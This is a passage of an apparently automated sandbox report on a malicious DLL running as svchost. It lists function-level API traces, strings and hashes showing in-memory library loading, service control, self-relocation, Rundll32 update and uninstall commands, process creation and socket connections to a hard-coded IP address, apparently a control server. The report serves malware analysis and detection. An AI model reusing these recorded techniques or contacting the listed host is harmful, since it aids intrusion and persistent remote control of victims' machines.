                                                                                                                • GetProcAddress.KERNEL32(00000000,IsBadReadPtr), ref: 10003BD3
                                                                                                                • LoadLibraryA.KERNEL32(?,?,?,?,1000397D), ref: 10003C0D
                                                                                                                • realloc.MSVCRT ref: 10003C2C
                                                                                                                • GetProcAddress.KERNEL32(?,?), ref: 10003C85
                                                                                                                • FreeLibrary.KERNEL32(?,1000397D), ref: 10003CC7
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4131325751.0000000010001000.00000020.00000001.01000000.00000008.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.4131288189.0000000010000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.4131358371.0000000010005000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.4131391729.0000000010006000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.4131424734.0000000010007000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_svchost.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Library$AddressLoadProc$Freerealloc
                                                                                                                • String ID: IsBadReadPtr$kernel32.dll
                                                                                                                • API String ID: 343009874-2271619998
                                                                                                                • Opcode ID: 449202d9bcd9b40c7640628575b91c895d67466b70a0093317474b01c75d12b5
                                                                                                                • Instruction ID: afc84e2e1f51588ee312ba66ad041d110bb41dc23133337ce681a0c6c223f4ac
                                                                                                                • Opcode Fuzzy Hash: 449202d9bcd9b40c7640628575b91c895d67466b70a0093317474b01c75d12b5
                                                                                                                • Instruction Fuzzy Hash: 45410571A0021AABFB51CF64C889B9EBBF8FF04395F118069E905E7259D735EE44CB90
                                                                                                                Function 100029B6 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 98filestringCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • memcpy.MSVCRT(?,?,00000170), ref: 100029D2
                                                                                                                • CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000000,00000000), ref: 10002A05
                                                                                                                • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 10002A28
                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 10002A3A
                                                                                                                • strlen.MSVCRT ref: 10002A47
                                                                                                                • wsprintfA.USER32 ref: 10002A6B
                                                                                                                • lstrcpyA.KERNEL32(?,?), ref: 10002A84
                                                                                                                  • Part of subcall function 100027BC: memset.MSVCRT ref: 100027D8
                                                                                                                  • Part of subcall function 100027BC: strrchr.MSVCRT ref: 100027E2
                                                                                                                  • Part of subcall function 100027BC: strrchr.MSVCRT ref: 10002811
                                                                                                                  • Part of subcall function 100027BC: strlen.MSVCRT ref: 10002821
                                                                                                                  • Part of subcall function 100027BC: strncpy.MSVCRT ref: 1000283B
                                                                                                                  • Part of subcall function 100027BC: memset.MSVCRT ref: 10002889
                                                                                                                  • Part of subcall function 100027BC: wsprintfA.USER32 ref: 100028A4
                                                                                                                  • Part of subcall function 100027BC: memset.MSVCRT ref: 100028B3
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4131325751.0000000010001000.00000020.00000001.01000000.00000008.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.4131288189.0000000010000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.4131358371.0000000010005000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.4131391729.0000000010006000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.4131424734.0000000010007000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_svchost.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: memset$Filestrlenstrrchrwsprintf$CloseCreateHandleWritelstrcpymemcpystrncpy
                                                                                                                • String ID: %s %s
                                                                                                                • API String ID: 3641787489-2939940506
                                                                                                                • Opcode ID: 5a089fb692a77de50dca985f2a1d46a33a195534b01f1893c6a9a2dd3832bb26
                                                                                                                • Instruction ID: 17f6a9bfa48d753ffad60fceaecdc7a51846e01dcf90a102910361a13764abaa
                                                                                                                • Opcode Fuzzy Hash: 5a089fb692a77de50dca985f2a1d46a33a195534b01f1893c6a9a2dd3832bb26
                                                                                                                • Instruction Fuzzy Hash: B5318972A001196FFB60DBA4CC89FDB73ACDB05395F104562F608E2085EF71AE44CB61
                                                                                                                Function 10002C96 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 72stringprocessCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • strlen.MSVCRT ref: 10002C9F
                                                                                                                • ??2@YAPAXI@Z.MSVCRT(00000001), ref: 10002CB3
                                                                                                                • memcpy.MSVCRT(00000000,?,00000001,00000001), ref: 10002CBF
                                                                                                                • strrchr.MSVCRT ref: 10002CC7
                                                                                                                • ??3@YAXPAX@Z.MSVCRT(00000000), ref: 10002D27
                                                                                                                  • Part of subcall function 10004529: LoadLibraryA.KERNEL32(wininet.dll,?,00000001,00000000), ref: 1000454D
                                                                                                                  • Part of subcall function 10004529: GetProcAddress.KERNEL32(00000000,InternetOpenA), ref: 10004564
                                                                                                                  • Part of subcall function 10004529: GetProcAddress.KERNEL32(00000000,InternetOpenUrlA), ref: 1000457E
                                                                                                                  • Part of subcall function 10004529: FreeLibrary.KERNEL32(00000000,?,00000001,00000000), ref: 1000459C
                                                                                                                  • Part of subcall function 1000248B: GetFileAttributesA.KERNEL32(00000001,10002CE8,00000001), ref: 1000248F
                                                                                                                  • Part of subcall function 1000248B: GetLastError.KERNEL32 ref: 1000249A
                                                                                                                • CreateProcessA.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 10002D18
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4131325751.0000000010001000.00000020.00000001.01000000.00000008.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.4131288189.0000000010000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.4131358371.0000000010005000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.4131391729.0000000010006000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.4131424734.0000000010007000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_svchost.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressLibraryProc$??2@??3@AttributesCreateErrorFileFreeLastLoadProcessmemcpystrlenstrrchr
                                                                                                                • String ID: D$WinSta0\Default
                                                                                                                • API String ID: 1737965409-1101385590
                                                                                                                • Opcode ID: fdc65b0dcff99aff6c43371ba455fda07db6a1f497c56a226c9a0abe83cfdb15
                                                                                                                • Instruction ID: 4c329e371b8b631c085a2e87808acd0a5feba54148e937fde04f6f1ec7f3be4b
                                                                                                                • Opcode Fuzzy Hash: fdc65b0dcff99aff6c43371ba455fda07db6a1f497c56a226c9a0abe83cfdb15
                                                                                                                • Instruction Fuzzy Hash: 6F01E1B75012286AFB01DBE49C45EDF77ACDF093D5F114422FE05E604ADEB49D0582E4
                                                                                                                Function 10004467 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 61libraryloaderCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • LoadLibraryA.KERNEL32(user32.dll,?,?,00000000,?,00000000,Function_00004CE2,10005170,000000FF,?,100042CA,00000000), ref: 1000448F
                                                                                                                • GetProcAddress.KERNEL32(00000000,OpenInputDesktop), ref: 100044A4
                                                                                                                • GetProcAddress.KERNEL32(00000000,OpenDesktopA), ref: 100044B0
                                                                                                                • GetProcAddress.KERNEL32(00000000,CloseDesktop), ref: 100044BC
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4131325751.0000000010001000.00000020.00000001.01000000.00000008.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.4131288189.0000000010000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.4131358371.0000000010005000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.4131391729.0000000010006000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.4131424734.0000000010007000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_svchost.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressProc$LibraryLoad
                                                                                                                • String ID: CloseDesktop$OpenDesktopA$OpenInputDesktop$user32.dll
                                                                                                                • API String ID: 2238633743-3711086354
                                                                                                                • Opcode ID: c36e72de9a328b3aed83568275539afdfd72128828bb5f39de00532976b64ac8
                                                                                                                • Instruction ID: 34d8331da3f18528c44290a267cf2e76cab1e846e39b69c6303802ebf673ca42
                                                                                                                • Opcode Fuzzy Hash: c36e72de9a328b3aed83568275539afdfd72128828bb5f39de00532976b64ac8
                                                                                                                • Instruction Fuzzy Hash: A3116DB5D00229ABEB11DFA9CC44FDDBAF8FB0C790F214125F511F2254CB7158008BA4
                                                                                                                Function 100023FA Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 42COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • printf.MSVCRT ref: 1000240A
                                                                                                                  • Part of subcall function 1000389D: VirtualAlloc.KERNEL32(?,?,00002000,00000004,?,759A4CB0,00000000,?,?,?,10002414,?,?,?,?,1000234E), ref: 100038D8
                                                                                                                  • Part of subcall function 1000389D: VirtualAlloc.KERNEL32(00000000,?,00002000,00000004,?,759A4CB0,00000000,?,?,?,10002414,?,?,?,?,1000234E), ref: 100038E8
                                                                                                                  • Part of subcall function 1000389D: GetProcessHeap.KERNEL32(00000000,00000014,?,759A4CB0,00000000,?,?,?,10002414,?,?,?,?,1000234E,?,10006E5C), ref: 100038F9
                                                                                                                  • Part of subcall function 1000389D: HeapAlloc.KERNEL32(00000000,?,759A4CB0,00000000,?,?,?,10002414,?,?,?,?,1000234E,?,10006E5C,?), ref: 10003900
                                                                                                                  • Part of subcall function 1000389D: VirtualAlloc.KERNEL32(?,?,00001000,00000004,?,759A4CB0,00000000,?,?,?,10002414,?,?,?,?,1000234E), ref: 10003924
                                                                                                                  • Part of subcall function 1000389D: VirtualAlloc.KERNEL32(?,?,00001000,00000004,?,759A4CB0,00000000,?,?,?,10002414,?,?,?,?,1000234E), ref: 10003933
                                                                                                                  • Part of subcall function 1000389D: memcpy.MSVCRT(00000000,?,?,?,759A4CB0,00000000,?,?,?,10002414,?,?,?,?,1000234E,?), ref: 10003944
                                                                                                                • OutputDebugStringA.KERNEL32(Can't load library from memory.,?,?,1000234E,?,10006E5C,?,00000000,00000000,?,?), ref: 10002421
                                                                                                                • printf.MSVCRT ref: 1000244D
                                                                                                                • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 10002462
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4131325751.0000000010001000.00000020.00000001.01000000.00000008.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.4131288189.0000000010000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.4131358371.0000000010005000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.4131391729.0000000010006000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.4131424734.0000000010007000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_svchost.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AllocVirtual$Heapprintf$DebugFreeOutputProcessStringmemcpy
                                                                                                                • String ID: Can't load library from memory.$LoadFromMemory $LoadFromMemory END---$PluginMe
                                                                                                                • API String ID: 2530445704-2282109540
                                                                                                                • Opcode ID: f0778e8a1c44c2343f6cf091ec4a36fe4ce25287fc1b95e6eb17d6c0cbbf42cd
                                                                                                                • Instruction ID: 01af0e0ac1652a7321e0a293c3daa08a0af86dfdeaa3eab1b942b575fdefc638
                                                                                                                • Opcode Fuzzy Hash: f0778e8a1c44c2343f6cf091ec4a36fe4ce25287fc1b95e6eb17d6c0cbbf42cd
                                                                                                                • Instruction Fuzzy Hash: C3F09636100114BBFF02AF90DC05FDE3B75EB897E2F348015FA0455069CF72581597A1
                                                                                                                Function 100020C8 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 36fileCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetModuleFileNameA.KERNEL32(?,00000104), ref: 100020E5
                                                                                                                • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 100020F3
                                                                                                                • GetTickCount.KERNEL32 ref: 100020F9
                                                                                                                • wsprintfA.USER32 ref: 10002113
                                                                                                                • MoveFileA.KERNEL32(?,?), ref: 1000212A
                                                                                                                • MoveFileExA.KERNEL32(?,00000000,00000004(MOVEFILE_DELAY_UNTIL_REBOOT)), ref: 1000213B
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4131325751.0000000010001000.00000020.00000001.01000000.00000008.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.4131288189.0000000010000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.4131358371.0000000010005000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.4131391729.0000000010006000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.4131424734.0000000010007000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_svchost.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: File$Move$CountDirectoryModuleNameSystemTickwsprintf
                                                                                                                • String ID: %s\%d.bak
                                                                                                                • API String ID: 830686190-2116986511
                                                                                                                • Opcode ID: c8f7a2f9335d496cf424573f89800cf957bdb9276c51bc95e16fdfb109c3bf7e
                                                                                                                • Instruction ID: c4293e3e21d6716b8372ba05ce181a3280e6ef40116a7aaffd0535516b57a778
                                                                                                                • Opcode Fuzzy Hash: c8f7a2f9335d496cf424573f89800cf957bdb9276c51bc95e16fdfb109c3bf7e
                                                                                                                • Instruction Fuzzy Hash: BEF0A4BA800278ABEB10EB94CDCDECB777DEB18785F100191F755D2065DAB59684CFA0
                                                                                                                Function 1000366A Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 35libraryloaderCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • LoadLibraryA.KERNEL32(kernel32.dll,?,00000144,00000000,?,?,100037E0), ref: 10003676
                                                                                                                • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 1000368E
                                                                                                                • GetProcAddress.KERNEL32(00000000,GetCurrentProcess), ref: 10003698
                                                                                                                • FreeLibrary.KERNEL32(00000000), ref: 100036AC
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4131325751.0000000010001000.00000020.00000001.01000000.00000008.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.4131288189.0000000010000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.4131358371.0000000010005000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.4131391729.0000000010006000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.4131424734.0000000010007000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_svchost.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressLibraryProc$FreeLoad
                                                                                                                • String ID: GetCurrentProcess$IsWow64Process$kernel32.dll
                                                                                                                • API String ID: 2256533930-2522683910
                                                                                                                • Opcode ID: 34a6eaa16ec599896768d47b9751df638f2169115c1a8e10c5d2607526b1ef77
                                                                                                                • Instruction ID: ef67112214a51d6d1f3e9f06108ff16868adfdb602b3d8d3b658392e0a076cbe
                                                                                                                • Opcode Fuzzy Hash: 34a6eaa16ec599896768d47b9751df638f2169115c1a8e10c5d2607526b1ef77
                                                                                                                • Instruction Fuzzy Hash: CBF0A072A00314BBF701D7E58C98DAF7BBCDB886D1B104019FA00A3208DB739D0189B5
                                                                                                                Function 100021FF Relevance: 12.2, APIs: 5, Strings: 3, Instructions: 161memorysleepCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • Sleep.KERNEL32(00000064), ref: 10002279
                                                                                                                • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 10002323
                                                                                                                • memcpy.MSVCRT(00000000,?,?), ref: 10002336
                                                                                                                • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 10002371
                                                                                                                • memcpy.MSVCRT(00000000,?,?), ref: 10002384
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4131325751.0000000010001000.00000020.00000001.01000000.00000008.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.4131288189.0000000010000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.4131358371.0000000010005000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.4131391729.0000000010006000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.4131424734.0000000010007000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_svchost.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AllocVirtualmemcpy$Sleep
                                                                                                                • String ID: GW2$SGSWh5-$SPh\n
                                                                                                                • API String ID: 1263862976-685354651
                                                                                                                • Opcode ID: 3d25bdad23a031e0b48f737afd54ec3eb76eea0dcd6b60b485997711385254f5
                                                                                                                • Instruction ID: 2f54f0f1129bbba38d4c41c0db51b56afb961a9339435d6967ffbe2678c67ccd
                                                                                                                • Opcode Fuzzy Hash: 3d25bdad23a031e0b48f737afd54ec3eb76eea0dcd6b60b485997711385254f5
                                                                                                                • Instruction Fuzzy Hash: E241F3B5104244BEF720DFA18CC6F7F7A6CEB457C4F10842AFA894548DCB76AE40A622
                                                                                                                Function 10001ACF Relevance: 12.1, APIs: 8, Instructions: 55servicesleepCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F), ref: 10001ADF
                                                                                                                • OpenServiceA.ADVAPI32(00000000,?,000F01FF), ref: 10001AF5
                                                                                                                • QueryServiceStatus.ADVAPI32(00000000,?), ref: 10001B06
                                                                                                                • ControlService.ADVAPI32(00000000,00000001,?), ref: 10001B1D
                                                                                                                • Sleep.KERNEL32(0000000A), ref: 10001B2F
                                                                                                                • QueryServiceStatus.ADVAPI32(00000000,?), ref: 10001B3A
                                                                                                                • CloseServiceHandle.ADVAPI32(00000000), ref: 10001B43
                                                                                                                • CloseServiceHandle.ADVAPI32(00000000), ref: 10001B4A
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4131325751.0000000010001000.00000020.00000001.01000000.00000008.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.4131288189.0000000010000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.4131358371.0000000010005000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.4131391729.0000000010006000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.4131424734.0000000010007000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_svchost.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Service$CloseHandleOpenQueryStatus$ControlManagerSleep
                                                                                                                • String ID:
                                                                                                                • API String ID: 2359367111-0
                                                                                                                • Opcode ID: 5fba824a85b92acc79a789ef028bf042a0167ae6a51034b94a07b5d3b0519e81
                                                                                                                • Instruction ID: 13eb0d6c039a265936ccbdc891ea19e15248044979c42994c6487f454c48f15c
                                                                                                                • Opcode Fuzzy Hash: 5fba824a85b92acc79a789ef028bf042a0167ae6a51034b94a07b5d3b0519e81
                                                                                                                • Instruction Fuzzy Hash: 87017531644627ABF7119BA09C89FFF7BBAEF0A7C1F204060FA01D509DEB648542D6A1
                                                                                                                Function 10001445 Relevance: 10.6, APIs: 7, Instructions: 85networkCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 1000180A: setsockopt.WS2_32(?,0000FFFF,00000080,00000000,00000004), ref: 1000182F
                                                                                                                  • Part of subcall function 1000180A: CancelIo.KERNEL32(?,?,10001455,00002081,00000000), ref: 10001838
                                                                                                                  • Part of subcall function 1000180A: InterlockedExchange.KERNEL32(?,00000000), ref: 10001844
                                                                                                                  • Part of subcall function 1000180A: closesocket.WS2_32(?), ref: 1000184D
                                                                                                                  • Part of subcall function 1000180A: SetEvent.KERNEL32(?,?,10001455,00002081,00000000), ref: 10001856
                                                                                                                • ResetEvent.KERNEL32(?,00002081,00000000,00000000), ref: 10001458
                                                                                                                • socket.WS2_32(00000002,00000001,00000006), ref: 10001469
                                                                                                                • gethostbyname.WS2_32(?), ref: 1000147A
                                                                                                                • htons.WS2_32(?), ref: 1000148F
                                                                                                                • connect.WS2_32(?,00000002,00000010), ref: 100014AC
                                                                                                                • setsockopt.WS2_32(?,0000FFFF,00000008,?,00000004), ref: 100014D1
                                                                                                                • WSAIoctl.WS2_32(?,98000004,?,0000000C,00000000,00000000,?,00000000,00000000), ref: 10001502
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4131325751.0000000010001000.00000020.00000001.01000000.00000008.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.4131288189.0000000010000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.4131358371.0000000010005000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.4131391729.0000000010006000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.4131424734.0000000010007000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_svchost.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Eventsetsockopt$CancelExchangeInterlockedIoctlResetclosesocketconnectgethostbynamehtonssocket
                                                                                                                • String ID:
                                                                                                                • API String ID: 4281462294-0
                                                                                                                • Opcode ID: 3bd37e16282c1c1f21b19040e991c0c37f16a42726fa5d42d22308dc76884aca
                                                                                                                • Instruction ID: 8d33707021d861f585806a6466cff3f66270e93c65c897c0ed9a4eea2b4cd3d2
                                                                                                                • Opcode Fuzzy Hash: 3bd37e16282c1c1f21b19040e991c0c37f16a42726fa5d42d22308dc76884aca
                                                                                                                • Instruction Fuzzy Hash: 9421BD71500719BFE7109FA4CC84EEBBBF9EF09394F104529F602A62A4C7B29D449B20
                                                                                                                Function 100012D4 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 54networkCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 100012D9
                                                                                                                • _CxxThrowException.MSVCRT(?,10005258), ref: 10001332
                                                                                                                • WSAStartup.WS2_32(00000202,?), ref: 10001343
                                                                                                                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 10001350
                                                                                                                • memcpy.MSVCRT(?,00000068,00000003), ref: 10001379
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4131325751.0000000010001000.00000020.00000001.01000000.00000008.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.4131288189.0000000010000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.4131358371.0000000010005000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.4131391729.0000000010006000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.4131424734.0000000010007000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_svchost.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CreateEventExceptionH_prologStartupThrowmemcpy
                                                                                                                • String ID: hx
                                                                                                                • API String ID: 80965288-1695387836
                                                                                                                • Opcode ID: 77854b9b63fc0fb3e868ca2b5d078d50e29d64ea9dc30742ffd87570b9eaf05b
                                                                                                                • Instruction ID: e29fc32a716e33b2e16fee5429824c3098a31f8f694cb1b228e84ed99c9fd0ff
                                                                                                                • Opcode Fuzzy Hash: 77854b9b63fc0fb3e868ca2b5d078d50e29d64ea9dc30742ffd87570b9eaf05b
                                                                                                                • Instruction Fuzzy Hash: 8211B4748013849EF710DBA8CD89BEEBBB8DF09384F50005DF141A7286DFB56A08CB62
                                                                                                                Function 1000273D Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 33processCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                • Rundll32 "%s",DllUpdate %s, xrefs: 10002774
                                                                                                                • Rundll32 "%s",Uninstall, xrefs: 10002792
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4131325751.0000000010001000.00000020.00000001.01000000.00000008.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.4131288189.0000000010000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.4131358371.0000000010005000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.4131391729.0000000010006000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.4131424734.0000000010007000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_svchost.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: wsprintf$ExecFileModuleName
                                                                                                                • String ID: Rundll32 "%s",DllUpdate %s$Rundll32 "%s",Uninstall
                                                                                                                • API String ID: 4265364758-3622515909
                                                                                                                • Opcode ID: 2fae55858e382da93d8a6581f30ac6264c287b13e5b54571d9062f30e9afb438
                                                                                                                • Instruction ID: 96afaeef2140f7acea31c6041c278450ca2d3413692d0236748e955fccce9fd0
                                                                                                                • Opcode Fuzzy Hash: 2fae55858e382da93d8a6581f30ac6264c287b13e5b54571d9062f30e9afb438
                                                                                                                • Instruction Fuzzy Hash: 0FF01875400228AFFB10DB50CC8DFCA777DEB08384F604191F659D2065DBB19698CF91
                                                                                                                Function 1000260E Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 26sleepmemoryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • LocalAlloc.KERNEL32(00000040,00000229,?,100022D7,?), ref: 10002616
                                                                                                                • memcpy.MSVCRT(00000001,119.91.152.151,00000228,?,100022D7,?), ref: 10002633
                                                                                                                • LocalSize.KERNEL32(00000000), ref: 1000263C
                                                                                                                  • Part of subcall function 10001863: ??2@YAPAXI@Z.MSVCRT(1000381E,?,00000144,00000000,1000381E,000000C8,00000144), ref: 10001884
                                                                                                                  • Part of subcall function 10001863: memcpy.MSVCRT(00000000,000000C8,1000381E,?,00000144,00000000,1000381E,000000C8,00000144), ref: 1000189C
                                                                                                                  • Part of subcall function 10001863: ??3@YAXPAX@Z.MSVCRT(00000144,00000144,1000381E,1000381E,00000004,1000381E,00000004,000000C8,00000004,?,00000003,?,00000144,00000000), ref: 100018F3
                                                                                                                  • Part of subcall function 10001863: ??2@YAPAXI@Z.MSVCRT(00000001,00000144,00000144,1000381E,1000381E,00000004,1000381E,00000004,000000C8,00000004,?,00000003,?,00000144,00000000), ref: 100018FB
                                                                                                                  • Part of subcall function 10001863: memcpy.MSVCRT(00000000,000000C8,00000001,00000001,00000144,00000144,1000381E,1000381E,00000004,1000381E,00000004,000000C8,00000004,?,00000003,?), ref: 1000190A
                                                                                                                  • Part of subcall function 10001863: ??3@YAXPAX@Z.MSVCRT(00000000,00000144,00000001,00000004,000000C8,00000004,?,00000003,?,00000144,00000000), ref: 10001932
                                                                                                                • Sleep.KERNEL32(00000001,00000000,00000000), ref: 1000264F
                                                                                                                • LocalFree.KERNEL32(00000000), ref: 10002656
                                                                                                                Strings
                                                                                                                Memory Dump Source
